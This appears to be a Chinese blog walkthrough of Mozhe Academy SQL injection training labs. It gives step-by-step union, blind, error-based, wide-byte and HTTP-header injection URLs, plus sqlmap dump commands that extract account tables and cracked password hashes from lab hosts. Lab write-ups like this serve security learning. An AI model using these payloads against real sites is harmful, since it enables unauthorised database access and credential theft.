萌新中的扛把子
萌新中的扛把子

墨者学院-SQL手工注入专题

这段时间联系一下SQL注入:
墨者SQL手工注入专题
在线靶场-SQL注入

文章目录

  • 数据库:MySQL
  • 数据库:Access
  • SQL Server
  • SQL注入漏洞测试(布尔盲注)
  • SQL手工注入漏洞测试(MySQL数据库-字符型)
  • X-Forwarded-For注入漏洞实战
  • SQL注入漏洞测试(报错盲注)
  • SQL注入漏洞测试(宽字节)
  • SQL注入漏洞测试(HTTP头注入)

数据库:MySQL

三种数据库的注入详解

墨者学院-SQL手工注入专题_第1张图片
MySQL的很简单

1,查字段数
http://mozhe.cn/new_list.php?id=0 order by 5 时报错,说明字段有4个

2,查数据库
http://mozhe.cn/new_list.php?id=0 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 0,1

limit 5,1时返回为空,说明只有5个数据库information_schema、mozhe_Discuz_StormGroup、mysql、performance_schema、sys。

3,查表
http://mozhe.cn/new_list.php?id=0 union select 1,2,table_name,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' limit 0,1

数据库mozhe_Discuz_StormGroup只有2个数据表,StormGroup_member、notice。

4,查字段
http://mozhe.cn/new_list.php?id=0 union select 1,2,column_name,4 from information_schema.columns where table_schema='mozhe_Discuz_StormGroup' and table_name='StormGroup_member' limit 0,1

数据库mozhe_Discuz_StormGroup中的表StormGroup_member只有4个字段,名称为:id,name,password,status。

5,查类容
http://mozhe.cn/new_list.php?id=0 union select 1,2,concat(name,password),4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1

查到两个数据:
mozhe-356f589a7df439f6f744ff19bb8092c0
mozhe-d8dbe0baa6e0bbcc3b0d1e8219a5d2ad

MD5:
dsan13
392969
登录第二个账号得到key

数据库:Access

access数据库没有索引语句只能猜解。

判断数据库方法:

and (select count(*) from msysobjects)>0(返回权限不足 access数据库)

and (select count(*) fromsysobjects)>0 (返回正常则为MSSQL数据库)

墨者学院-SQL手工注入专题_第2张图片
直接用sqlmap跑:
默认回车,线程设置10.
跑出来两个表:
python sqlmap.py -u "http://219.153.49.228:40259/new_list.asp?id=1" --data="id=1" --tables
墨者学院-SQL手工注入专题_第3张图片
爆字段
python sqlmap.py -u "http://219.153.49.228:40259/new_list.asp?id=1" --data="id=1" -T admin --columns
墨者学院-SQL手工注入专题_第4张图片
这里猜解到username和passwd这两个字段,很有可能用户名和密码存放在这个两个字段中

读取username和passwd字段中的数据
python sqlmap.py -u "http://219.153.49.228:40259/new_list.asp?id=1" --data="id=1" -T admin -C username,passwd --dump
墨者学院-SQL手工注入专题_第5张图片md5解密得到密码
墨者学院-SQL手工注入专题_第6张图片
登录得到flag

记录个讲的很好的教程:sqlmap注入access数据库

SQL Server

https://blog.csdn.net/qq_42357070/article/details/81239721

这题道感觉很复杂,手工注入很麻烦,还是用sqlmap跑吧。

SQL注入漏洞测试(布尔盲注)

数据库:
python sqlmap.py -u http://219.153.49.228:46896/new_list.php?id=1 --dbs --threads 10

墨者学院-SQL手工注入专题_第7张图片

表:
python sqlmap.py -u http://219.153.49.228:46896/new_list.php?id=1 -D stormgroup --tables --threads 10
墨者学院-SQL手工注入专题_第8张图片
字段:
python sqlmap.py -u http://219.153.49.228:46896/new_list.php?id=1 -D stormgroup -T member --columns --threads 10
墨者学院-SQL手工注入专题_第9张图片
内容:
python sqlmap.py -u http://219.153.49.228:46896/new_list.php?id=1 -D stormgroup -T member -C name,password,status --dump --threads 10

墨者学院-SQL手工注入专题_第10张图片得到两个账号:

mozhe-3114b433dece9180717f2b7de56b28a3-0
mozhe-72b907f67333f6b1831ef219d6ef7832-1

md5:
mozhe-816761-1

SQL手工注入漏洞测试(MySQL数据库-字符型)

墨者学院-SQL手工注入专题_第11张图片1,http://219.153.49.228:45334/new_list.php?id=tingjigonggao'
报错。

2,http://219.153.49.228:45334/new_list.php?id=tingjigonggao' --+
没有报错,存在字符型注入。

3,http://219.153.49.228:45334/new_list.php?id=tingjigonggao' order by 5 --+
猜测字段数为5,报错。

4,http://219.153.49.228:45334/new_list.php?id=tingjigonggao' order by 4 --+
猜测字段数为4,正常,字段数为4。

5,http://219.153.49.228:45334/new_list.php?id=' union select 1,2,3,4 --+
墨者学院-SQL手工注入专题_第12张图片
找到回显位置2和3。

6,http://219.153.49.228:45334/new_list.php?id=' union select 1,2,schema_name,4 from information_schema.schemata limit 0,1--+
墨者学院-SQL手工注入专题_第13张图片
第一个数据库为information_schema

7,http://219.153.49.228:45334/new_list.php?id=' union select 1,2,schema_name,4 from information_schema.schemata limit 1,1--+

墨者学院-SQL手工注入专题_第14张图片
第二个数据库为mozhe_discuz_stormgroup

8,同理:
所有数据库为mysql,information_schema,mozhe_discuz_stormgroup,performance_schema,test

9,使用mozhe_discuz_stormgroup数据库爆表
http://219.153.49.228:45334/new_list.php?id=' union select 1,2,table_name,4 from information_schema.tables where table_schema='mozhe_discuz_stormgroup' limit 0,1--+
墨者学院-SQL手工注入专题_第15张图片

10,同理,爆出所有数据库:

notice,stormgroup_member

这里使用第二个数据库stormgroup_member,所以就不继续爆了。

11,http://219.153.49.228:45334/new_list.php?id=' union select 1,2,column_name,4 from information_schema.columns where table_schema='mozhe_discuz_stormgroup' and table_name='stormgroup_member' limit 0,1--+
墨者学院-SQL手工注入专题_第16张图片

12,同理,爆出所有字段名为:
id,name,password,status

13,http://219.153.49.228:45334/new_list.php?id=' union select 1,2,concat(name,'-',password),4 from mozhe_discuz_stormgroup.stormgroup_member limit 0,1--+
墨者学院-SQL手工注入专题_第17张图片
14,爆出两个账号:
mozhe-356f589a7df439f6f744ff19bb8092c0
mozhe-9b7a0a48bdc5981497e68c7b1ec9d01c

15,md5解密:
mozhe-dsan13
mozhe-821078

16,登录第二个得到flag

X-Forwarded-For注入漏洞实战

墨者学院-SQL手工注入专题_第18张图片
这种题还是第一次遇到,因为要记录ip地址,所以要添加一个X-Forwarded-For: *的头。

1,复制信息到b.txt中。
墨者学院-SQL手工注入专题_第19张图片

2,构造sqlmap语句爆出数据库。
python sqlmap.py -r D:\desktop\b.txt --dbs --batch --threads 10

常用参数:
--batch:批处理,在检测过程中会问用户一些问题,使用这个参数统统使用默认值。
--threads: 设置多线程,默认为1,最大10。
sqlmap全参数详解

在这里插入图片描述
3,爆webcalendar数据库中的表。
python sqlmap.py -r D:\desktop\b.txt -D webcalendar --tables --batch --threads 10
墨者学院-SQL手工注入专题_第20张图片
4,爆字段内容。
python sqlmap.py -r D:\desktop\b.txt -D webcalendar -T user --dump --batch --threads 10
墨者学院-SQL手工注入专题_第21张图片
5,登录得到flag。
墨者学院-SQL手工注入专题_第22张图片

SQL注入漏洞测试(报错盲注)

墨者学院-SQL手工注入专题_第23张图片学习基于extractvalue()和updatexml()的报错注入

使用方法:updatexml(aaa ,concat(bbb,( SQL语句 ),bbb),aaa)

其中:aaa和bbb随便输入什么东西
回显:error:‘bbb 查询的SQL结果 bbb’

例:updatexml(1,concat('~',(select database()),'~'),1)
在这里插入图片描述

解题:

1,http://219.153.49.228:48410/new_list.php?id=1'
报错。

2,http://219.153.49.228:48410/new_list.php?id=1' --+
正常,存在注入。

3,根据题目提示使用updatexml()进行报错注入。
http://219.153.49.228:48410/new_list.php?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
爆出了数据库stormgroup。

4,爆表:
http://219.153.49.228:48410/new_list.php?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),0x7e),1)--+
在这里插入图片描述
爆出表:member

5,爆字段:
http://219.153.49.228:48410/new_list.php?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='stormgroup' and table_name='member' limit 0,1),0x7e),1)--+
在这里插入图片描述
6,同上,爆出其他字段。
name,password,status

7,爆字段类容。
http://219.153.49.228:49504/new_list.php?id=1' and updatexml(1,concat(0x7e,(select concat(name,'-',password) from stormgroup.member limit 0,1),0x7e),1)--+
在这里插入图片描述

8,同上,爆出所有账号,密码。
mozhe-3114b433dece9180717f2b7de
mozhe-773243a831d361bcdb225f0dd

9,但是这里有个坑,因为updatexml只能输出32位,所以还要用substr()把后面几位爆出来。
http://219.153.49.228:49504/new_list.php?id=1' and updatexml(1,concat(0x7e,(select concat(name,'-',substr(password,26)) from stormgroup.member limit 0,1),0x7e),1)--+
在这里插入图片描述
得到密码:3114b433dece9180717f2b7de56b28a3
和:3783d53ee620b2901c8eaae3b56b28a3

10,md5解密登录得到flag。

SQL注入漏洞测试(宽字节)

墨者学院-SQL手工注入专题_第24张图片

宽字节注入原理:
  1,出于安全考虑,单引号'会被转义为/'进入后台。
  2,%bf/'等于縗’,这样就成功将/号变为无效字符,从而正常使用单引号。(%bf=β

解题:

1,由于题目是宽字节注入,直接使用宽字节注入方法进行注入。
http://219.153.49.228:41108/new_list.php?id=-1%df

在这里插入图片描述
报错正常,开始注入。

2,确定字段数
http://219.153.49.228:41108/new_list.php?id=-1%df' order by 5 --+

order by 6 时报错,字段数为5。
在这里插入图片描述

3,找到回显点,回显点为5和3。
http://219.153.49.228:41108/new_list.php?id=-1%df' union select 1,2,3,4,5 --+
墨者学院-SQL手工注入专题_第25张图片
4,爆数据库。
http://219.153.49.228:41108/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(schema_name) from information_schema.schemata --+
在这里插入图片描述

5,爆表,因为引号被转义,库名,表名使用16进制。
http://219.153.49.228:41108/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=0x6d6f7a68655f64697363757a5f73746f726d67726f7570 --+
墨者学院-SQL手工注入专题_第26张图片
6,爆字段。
http://219.153.49.228:41108/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_schema=0x6d6f7a68655f64697363757a5f73746f726d67726f7570 and table_name=0x73746f726d67726f75705f6d656d626572 --+
墨者学院-SQL手工注入专题_第27张图片
7,爆字段类容。
http://219.153.49.228:41108/new_list.php?id=-1%df' union select 1,2,3,4,group_concat(name,password,status) from mozhe_discuz_stormgroup.stormgroup_member --+

在这里插入图片描述
8,md5解密,登录。
墨者学院-SQL手工注入专题_第28张图片

SQL注入漏洞测试(HTTP头注入)

墨者学院-SQL手工注入专题_第29张图片
第一次做http头注入的题目,看了看题解是在host上注入。

1,抓包,修改为Host: or 1=1
在这里插入图片描述
报错
在这里插入图片描述2,找注入点
host: union select 1,2,3,4
在这里插入图片描述
3,暴库
Host: union select 1,2,3,group_concat(schema_name) from information_schema.schemata
在这里插入图片描述
4,爆表
Host: union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='pentesterlab'
在这里插入图片描述
5,爆字段
Host: union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema='pentesterlab' and table_name='flag'
在这里插入图片描述
6,爆flag
Host: union select 1,2,3,group_concat(flag) from pentesterlab.flag
在这里插入图片描述
7,验证flag
墨者学院-SQL手工注入专题_第30张图片

你可能感兴趣的:(墨者学院)

  • 微服务调试:多环境 env 组件详解 时雨h 算法JAVA面试javapython运维
    微服务调试:多环境env组件详解一、多环境env组件(一)微服务调试的痛点在微服务架构下,开发人员在调试过程中常常会遇到各种挑战。其中一个常见的问题就是在多人协作的开发环境中,如何确保自己的调试请求能够准确地到达自己本地的服务实例,而不是被其他开发者的实例所拦截。例如,假设团队中有两位开发人员A和B,他们都在本地启动了名为"user-service"的微服务实例。当A发起一个针对"user-ser
  • ChatGPT、DeepSeek、Grok 三者对比:AI 语言模型的博弈与未来 一ge科研小菜菜 人工智能人工智能
    个人主页:一ge科研小菜鸡-CSDN博客期待您的关注1.引言随着人工智能技术的飞速发展,AI语言模型已经成为人机交互、内容创作、代码生成、智能问答等领域的重要工具。其中,ChatGPT(OpenAI)、DeepSeek(中国团队研发)和Grok(xAI,ElonMusk旗下公司)是当前三大具有代表性的AI语言模型。它们在技术架构、应用场景、用户体验、生态开放性等多个维度各具特色,并针对不同的用户需
  • IPC Kit基础入门:理解HarmonyOS的进程间通信架构 SameX-4869 harmonyos架构华为
    本文旨在深入探讨华为鸿蒙HarmonyOSNext系统(截止目前API12)的技术细节,基于实际开发实践进行总结。主要作为技术分享与交流载体,难免错漏,欢迎各位同仁提出宝贵意见和问题,以便共同进步。本文为原创内容,任何形式的转载必须注明出处及原作者。在HarmonyOS应用开发中,进程间通信(IPC)是构建复杂应用架构的关键要素。IPCKit为开发者提供了强大的进程间通信能力,使不同进程之间能够高
  • Spring Data JDBC 详解 m0_74823933 面试学习路线阿里巴巴springjava数据库
    目录一、JPA背景?二、SpringBoot整合SpringdataJDBC??1.配置数据源?2.配置Druid的admin后台??3.Spring-data-jdbc常用接口查询策略1)?CrudRepository增删改查2)PagingAndSortingRepository分页排序一、JPA背景早期的JPA的特性是懒加载和关联查询,一下能查出所有的关联信息,但我们开发者在查询SQL的时候
  • 一个简单的语音识别实现---百度在线语音识别REST API SDK(Python)简单使用 DerrickOzil 语音识别pythonsdk语音识别
    百度在线语音识别RESTAPISDK(Python)简单使用首先申请开发者权限注册开发者信息完成注册创建新应用下载SDK并查看key在应用管理中,选择查看key,记录AppID、APIKey、SecretKey三个参数值。测试音频链接:http://pan.baidu.com/s/1o8Ue4B4密码:o5r1]注意事项音频格式限制pcm(不压缩)、wav、amr采样频率及位数支持评测8k/16k
  • 【西安电子科技大学考研】25官方复试专业课参考书目汇总 西电研梦 考研西电经验分享面试西安电子科技大学
    初试已经顺利考完啦、成绩已经公布,现在已经有很多同学来问学长学姐,复试参考书有哪些,复试应该做好哪些准备。故此学长学姐给大家整理好了西安电子科技大学各个学院的复试参考书目录,有需要的同学可以参考一下哈。大家可以结合本篇文章内容与招生目录参考书对比一下:【西电考研复试资料、讲课班陆续上线中~~~】有的参考书更新了版本,但是招生目录里仍然是之前的一些旧版本,关于参考书的版本问题,大家也可以在群内问一下
  • 西安电子科技大学 | 近期官方视频+文章(涵盖招生+录取统计) 西电研梦 西电经验分享考研
    今年、明年考研的学弟学妹们可以看看涵盖今年讲课西电录取统计【西安电子科技大学官方】研究生招生宣传你一定值得一看02、计算机科学与技术学院(近期视频+文章)QQ群:867684593①、西电考研|833、834初+复试第一名许学长经验分享https://www.bilibili.com/video/BV1oE4m1R72a/②、25西电考研|计科院专业课139分学长经验分享https://www.b
  • CVE-2017-5645(使用 docker 搭建) JM丫 网络安全
    介绍:是一个与ApacheLog4j2相关的安全漏洞,属于远程代码执行,它可能允许攻击者通过构造恶意的日志信息在目标系统上执行任意代码Log4j2介绍Log4j2是Apache的一个日志记录工具,属于Java应用的日志框架,它是Log4j的升级版,性能更好,功能更多.它被广泛的适用于Java应用程序中,帮助开发者记录程序运行的时候的日子信息,是Java生态系统中最重要的一个日志框架之一漏洞编号:C
  • 浩方wms:什么是海外仓WMS系统?作用是什么? haofang_software 大数据个人开发sass数据库科技
    浩方动力科技认为,海外仓作为连接卖家与海外消费者的关键节点,其重要性愈发凸显。海外仓WMS系统(WarehouseManagementSystem),作为一种专门针对海外仓运营的信息化管理系统,正成为提升海外仓运营效率和服务水平的得力助手。什么是海外仓WMS系统呢?海外仓管理系统又有什么作用?浩方WMS,今天来为大家讲解一下海外仓WMS的作用和意义。海外仓WMS系统,顾名思义,是专为海外仓储业务设
  • Python(1)Python全方位指南:定义、应用与零基础入门实战 一个天蝎座 白勺 程序猿 Python入门到精通python开发语言
    背景:为什么Python成为开发者必备技能?‌Python自1991年发布以来,凭借‌“简单高效”‌的设计理念,成为全球增长最快的编程语言。根据TIOBE2023年榜单,Python稳居前三,其核心竞争力包括:‌开发效率高‌:代码量仅为Java的1/5,C++的1/10。‌跨领域通吃‌:从Web开发到AI训练,覆盖90%以上技术场景。‌企业级应用‌:YouTube用Python处理视频推荐,NAS
  • GitHub一周热门ai项目 2025.3.17 BillyXie23 AI探索ai人工智能
    项目1:Significant-Gravitas/AutoGPT地址:significant-gravitas.github.com/AutoGPT描述:AutoGPT致力于为所有人提供可访问的AI工具,让用户专注于重要事务。Stars:173,449推荐理由:适合想要探索自动化AI应用的开发者,支持自定义扩展,开源生态强大,适合构建智能助手、自动化流程等场景。项目2:AUTOMATIC1111/
  • CSDN社区,到底该不该用DeepSeek AI生成文章? Small踢倒coffee_氕氘氚 python经验分享
    ##引言在当今数字化时代,人工智能(AI)技术正以惊人的速度发展,逐渐渗透到各个行业和领域。作为AI技术的一个重要分支,自然语言处理(NLP)在内容创作、文本生成等方面展现出了巨大的潜力。DeepSeekAI作为一款先进的AI写作工具,能够自动生成高质量的文章,极大地提高了内容创作的效率。然而,随着AI生成内容的普及,CSDN社区中的开发者、技术爱好者和内容创作者们开始思考一个问题:我们到底该不该
  • Python自动化炒股:利用XGBoost和LightGBM进行股票市场预测的实战案例 云策量化 Python自动化炒股量化投资量化软件python量化交易QMTPTrade量化炒股量化投资deepseek
    推荐阅读:《程序化炒股:如何申请官方交易接口权限?个人账户可以申请吗?》Python自动化炒股:利用XGBoost和LightGBM进行股票市场预测的实战案例在当今快节奏的金融市场中,自动化交易和预测模型成为了投资者和交易者的重要工具。Python以其强大的数据处理能力和丰富的机器学习库,成为了实现这些模型的首选语言。本文将带你了解如何使用XGBoost和LightGBM这两个流行的机器学习算法来
  • 如何利用 AI 技术快速定位和修复生产环境问题 pytorch人工智能
    摘要生产环境的问题往往难以复现,排查成本高,直接影响用户体验。传统的日志分析、异常监控、APM(应用性能监控)等方法已经被广泛使用,但随着AI技术的发展,我们可以进一步自动化问题检测、智能日志分析、异常根因分析,极大提高生产问题的排查效率。本文将探讨如何利用AI技术优化生产环境的排查流程,并提供实际可运行的示例代码,帮助开发者掌握AI赋能下的智能问题诊断方法。引言生产环境的稳定性是衡量一个系统可靠
  • HarmonyNext实战:基于ArkTS的高性能3D渲染引擎开发 harmonyos-next
    HarmonyNext实战:基于ArkTS的高性能3D渲染引擎开发引言3D渲染引擎是现代图形应用的核心,广泛应用于游戏开发、虚拟现实、工业设计等领域。HarmonyNext作为新一代操作系统,提供了强大的图形处理能力,而ArkTS作为其开发语言,能够帮助开发者高效实现高性能的3D渲染引擎。本文将详细讲解如何在HarmonyNext平台上使用ArkTS开发一个3D渲染引擎。我们将从3D渲染的基本原理
  • HarmonyNext实战:基于ArkTS的分布式任务调度系统开发 harmonyos-next
    HarmonyNext实战:基于ArkTS的分布式任务调度系统开发引言在HarmonyNext生态系统中,分布式任务调度是一个核心且复杂的技术领域。随着设备互联的普及,如何在多设备间高效、可靠地分配和执行任务成为开发者面临的重要挑战。本文将深入探讨如何利用ArkTS语言构建一个高性能的分布式任务调度系统,涵盖从架构设计到代码实现的完整过程。分布式任务调度系统概述分布式任务调度系统的核心目标是将任务
  • HarmonyNext实战:基于ArkTS的高性能区块链应用开发 harmonyos-next
    HarmonyNext实战:基于ArkTS的高性能区块链应用开发引言区块链技术以其去中心化、不可篡改和透明性等特点,正在金融、供应链、物联网等领域掀起革命性变革。HarmonyNext作为新一代操作系统,提供了强大的分布式计算和网络通信能力,而ArkTS作为其开发语言,能够帮助开发者高效实现高性能的区块链应用。本文将详细讲解如何在HarmonyNext平台上使用ArkTS开发一个区块链应用。我们将
  • 基于HarmonyNext的ArkTS实战:构建跨平台企业级任务管理系统 harmonyos-next
    基于HarmonyNext的ArkTS实战:构建跨平台企业级任务管理系统引言在现代企业中,任务管理系统是提升团队协作效率的重要工具。随着HarmonyNext的推出,ArkTS作为其核心开发语言,为开发者提供了强大的跨平台能力和高效的性能支持。本文将深入探讨如何利用ArkTS构建一个跨平台的企业级任务管理系统,涵盖从任务创建、分配到跟踪的完整流程。通过实战案例,我们将展示ArkTS在Harmony
  • HarmonyNext实战:基于ArkTS的分布式数据同步应用开发 harmonyos-next
    HarmonyNext实战:基于ArkTS的分布式数据同步应用开发引言在分布式系统中,数据同步是一个核心问题,尤其是在多设备协同的场景下。HarmonyNext作为新一代操作系统,提供了强大的分布式能力,而ArkTS作为其开发语言,能够帮助开发者高效实现分布式数据同步。本文将详细讲解如何在HarmonyNext平台上使用ArkTS开发一个分布式数据同步应用。我们将从分布式数据同步的基本原理入手,逐
  • 代码签名证书申请指南 ssl证书
    1.什么是代码签名?代码签名是为软件、脚本或可执行文件添加数字签名的技术,用于验证开发者身份并确保代码未被篡改。签名后,用户下载时会显示“已验证发布者”,减少安全警告。2.申请前的准备工作确认需求证书类型:选择标准代码签名证书(OV)或增强型证书(EV)。OV:需企业验证,适合常规软件。EV:需严格验证,支持硬件令牌,兼容微软SmartScreen快速信任。选择证书颁发机构(CA)→代码签名证书申
  • 使用代码签名证书有什么优势? ssl证书数字证书
    一、确保代码来源可靠代码签名证书能够明确标识代码的开发者身份。当用户下载使用带有签名证书的软件时,通过验证证书信息,就可以确定该代码是由特定的、可信赖的开发者所提供。比如,知名软件公司对其产品代码进行签名,用户便能放心使用,避免因使用来源不明的代码而遭受潜在风险,如恶意软件植入等。二、保障代码完整性代码在传输和存储过程中,可能会受到各种因素影响而发生改变。代码签名证书能有效保障代码的完整性。在签名
  • 域名被微信拦截与QQ拦截的对比分析 拦截器微信qq域名
    微信与QQ作为腾讯旗下的两大社交平台,均会对存在风险的域名进行拦截,但两者在机制、表现及处理方式上存在显著差异。以下是两者的相同点与不同点,结合具体拦截表现进行解析:一、相同点触发原因相似域名历史问题:若域名曾因违规内容被举报或封禁,再次使用时可能被微信和QQ同时拦截。备案要求:未备案的域名或未加入腾讯白名单的域名,均可能被拦截。诱导分享与流量过大:频繁诱导用户分享(如“转发得红包”)或短时间内传
  • AI大模型学习路线:从入门到精通的完整指南【2025最新】 AI大模型-大飞 人工智能学习大模型LLMAI程序员大模型学习
    引言近年来,以GPT、BERT、LLaMA等为代表的AI大模型彻底改变了人工智能领域的技术格局。它们不仅在自然语言处理(NLP)任务中表现卓越,还在计算机视觉、多模态交互等领域展现出巨大潜力。本文旨在为开发者、研究者和技术爱好者提供一条清晰的学习路径,帮助读者逐步掌握大模型的核心技术并实现实际应用。一、基础阶段:构建知识体系数学与理论基础线性代数:矩阵运算、特征值与奇异值分解是大模型参数优化的基础
  • 苹果签名的战略价值:解析六大核心优势与商业赋能逻辑 ios
    苹果签名的战略价值:解析六大核心优势与商业赋能逻辑(因篇幅过长所以分为两篇帖子发~)在iOS应用生态中,签名机制既是技术护城河,也是开发者突破分发限制的关键武器。本文将从开发效率、商业变现、安全管控等维度,深度剖析苹果签名体系带来的独特价值。一、突破AppStore审核壁垒,加速产品验证苹果签名最核心的优势在于规避冗长审核流程。根据2023年统计,AppStore平均审核周期为24小时,首次提交通
  • 代码签名证书:快速消除不安全警告! ssl证书
    一、代码签名证书的作用代码签名证书是由受信任的证书颁发机构(CA)颁发给软件开发者的数字证书,用于对软件代码进行数字签名。通过数字签名,开发者可以证明代码自签名以来未被篡改,从而确保软件的完整性和真实性。代码签名证书是消除“未知发布者”警告的最有效方式。二、如何申请和使用代码签名证书1、选择合适的证书类型:根据软件类型和开发需求,选择标准代码签名证书或EV代码签名证书。EV证书提供了更高级别的身份
  • 【技术实测】单一世界承载数万单位无分片同步!全球低延迟互动DEMO开放测试 微网兔子 後端技術c++服务器unity后端分布式
    核心突破分散式同步引擎`实现三大关键指标:✅无分片架构-全域实体即时同步✅毫秒级延迟-跨洲网路优化✅万级货运-秒登入不排队万人单一世界最新技术测试影片目前,我们已实现一定的技术突破,并希望收集开发者的回馈,以确定下一步的优化方向。为了验证这项技术,我们部署了一个测试环境,具体情况如下:3万名玩家的即时互动3D测试环境(512×512平方米)已部署12,000个模拟客户端,开放18,000个名额给开
  • Python与Web 3.0:重新定义数字身份验证的未来 Echo_Wish Python!实战!python前端开发语言
    Python与Web3.0:重新定义数字身份验证的未来随着Web3.0的迅猛发展,传统的身份验证方式正面临越来越大的挑战。从依赖中心化服务器存储用户数据,到如今去中心化、用户掌控数据的新时代,身份验证系统经历了前所未有的变革。而作为一个人工智能、区块链和Python技术的深度爱好者,我认为Python将成为构建Web3.0身份验证系统的重要工具。今天,我们就来聊聊如何结合Python与Web3.0
  • CUDA内核调优工具ncu的详细使用教程 东北豆子哥 CUDA数值计算/数值优化linux高性能计算
    NVIDIANsightCompute(ncu)是一款用于CUDA内核性能分析的工具,帮助开发者优化CUDA程序。以下是详细的使用教程和示例说明。1.安装NVIDIANsightCompute确保已安装CUDAToolkit和NVIDIA驱动,然后从NVIDIA官网下载并安装NsightCompute。2.基本使用2.1启动ncu通过命令行启动ncu,基本语法如下:ncu[options][app
  • 荣耀CEO赵明内网发布告别文章,正式告别荣耀和职场 国货崛起 其他智能手机智能硬件
    2025年1月17日,荣耀终端有限公司CEO赵明在内部论坛发布长文,正式宣布告别荣耀和职场。这封告别信在荣耀内部引发强烈反响,员工们纷纷留言表达不舍与祝福。赵明在信中回顾了他在荣耀的职业生涯。2015年,他从华为消费者业务CMO调任荣耀总裁,带领荣耀从互联网手机品牌发展成为全球领先的智能终端提供商。在任期间,他主导了荣耀品牌的独立运营,成功打造了荣耀Magic系列、数字系列等多款爆款产品,使荣耀在
  • Python爬虫实战教程——如何爬取多个国家的实时汇率数据 Python爬虫项目 2025年爬虫实战项目python爬虫chrome信息可视化
    1.引言随着全球经济一体化,跨国交易和投资变得越来越普遍,实时汇率数据成为了金融领域和国际贸易中的关键数据。对于金融分析师、投资者或者是开发者来说,能够实时获取并分析汇率数据是至关重要的。本文将深入探讨如何使用Python爬虫技术抓取多个国家的实时汇率数据。我们将使用最新的技术和工具,介绍如何通过Python编写一个高效、可扩展的汇率数据爬虫。2.为什么需要实时汇率数据?汇率数据被广泛应用于以下几
  • 统一思想认识 永夜-极光 思想
    1.统一思想认识的基础,才能有的放矢  原因:    总有一种描述事物的方式最贴近本质,最容易让人理解.    如何让教育更轻松,在于找到最适合学生的方式.          难点在于,如何模拟对方的思维基础选择合适的方式.   &
  • Joda Time使用笔记 bylijinnan javajoda time
    Joda Time的介绍可以参考这篇文章: http://www.ibm.com/developerworks/cn/java/j-jodatime.html 工作中也常常用到Joda Time,为了避免每次使用都查API,记录一下常用的用法:     /** * DateTime变化(增减) */ @Tes
  • FileUtils API eksliang FileUtilsFileUtils API
    转载请出自出处:http://eksliang.iteye.com/blog/2217374 一、概述 这是一个Java操作文件的常用库,是Apache对java的IO包的封装,这里面有两个非常核心的类FilenameUtils跟FileUtils,其中FilenameUtils是对文件名操作的封装;FileUtils是文件封装,开发中对文件的操作,几乎都可以在这个框架里面找到。 非常的好用。
  • 各种新兴技术 不懂事的小屁孩 技术
    1:gradle Gradle 是以 Groovy 语言为基础,面向Java应用为主。基于DSL(领域特定语言)语法的自动化构建工具。 现在构建系统常用到maven工具,现在有更容易上手的gradle, 搭建java环境: http://www.ibm.com/developerworks/cn/opensource/os-cn-gradle/ 搭建android环境: http://m
  • tomcat6的https双向认证 酷的飞上天空 tomcat6
    1.生成服务器端证书 keytool -genkey -keyalg RSA -dname "cn=localhost,ou=sango,o=none,l=china,st=beijing,c=cn" -alias server -keypass password -keystore server.jks -storepass password -validity 36
  • 托管虚拟桌面市场势不可挡 蓝儿唯美
    用户还需要冗余的数据中心,dinCloud的高级副总裁兼首席营销官Ali Din指出。该公司转售一个MSP可以让用户登录并管理和提供服务的用于DaaS的云自动化控制台,提供服务或者MSP也可以自己来控制。 在某些情况下,MSP会在dinCloud的云服务上进行服务分层,如监控和补丁管理。 MSP的利润空间将根据其参与的程度而有所不同,Din说。 “我们有一些合作伙伴负责将我们推荐给客户作为个
  • spring学习——xml文件的配置 a-john spring
    在Spring的学习中,对于其xml文件的配置是必不可少的。在Spring的多种装配Bean的方式中,采用XML配置也是最常见的。以下是一个简单的XML配置文件: <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.or
  • HDU 4342 History repeat itself 模拟 aijuans 模拟
    来源:http://acm.hdu.edu.cn/showproblem.php?pid=4342 题意:首先让求第几个非平方数,然后求从1到该数之间的每个sqrt(i)的下取整的和。 思路:一个简单的模拟题目,但是由于数据范围大,需要用__int64。我们可以首先把平方数筛选出来,假如让求第n个非平方数的话,看n前面有多少个平方数,假设有x个,则第n个非平方数就是n+x。注意两种特殊情况,即
  • java中最常用jar包的用途 asia007 java
    java中最常用jar包的用途 jar包用途axis.jarSOAP引擎包commons-discovery-0.2.jar用来发现、查找和实现可插入式接口,提供一些一般类实例化、单件的生命周期管理的常用方法.jaxrpc.jarAxis运行所需要的组件包saaj.jar创建到端点的点到点连接的方法、创建并处理SOAP消息和附件的方法,以及接收和处理SOAP错误的方法.  w
  • ajax获取Struts框架中的json编码异常和Struts中的主控制器异常的解决办法 百合不是茶 jsjson编码返回异常
    一:ajax获取自定义Struts框架中的json编码  出现以下 问题:       1,强制flush输出  json编码打印在首页 2, 不强制flush js会解析json 打印出来的是错误的jsp页面   却没有跳转到错误页面 3,  ajax中的dataType的json 改为text 会
  • JUnit使用的设计模式 bijian1013 java设计模式JUnit
    JUnit源代码涉及使用了大量设计模式 1、模板方法模式(Template Method)         定义一个操作中的算法骨架,而将一些步骤延伸到子类中去,使得子类可以不改变一个算法的结构,即可重新定义该算法的某些特定步骤。这里需要复用的是算法的结构,也就是步骤,而步骤的实现可以在子类中完成。   
  • Linux常用命令(摘录) sunjing crondchkconfig
    chkconfig --list   查看linux所有服务 chkconfig --add servicename 添加linux服务 netstat -apn | grep 8080  查看端口占用 env 查看所有环境变量 echo $JAVA_HOME 查看JAVA_HOME环境变量   安装编译器 yum install -y gcc
  • 【Hadoop一】Hadoop伪集群环境搭建 bit1129 hadoop
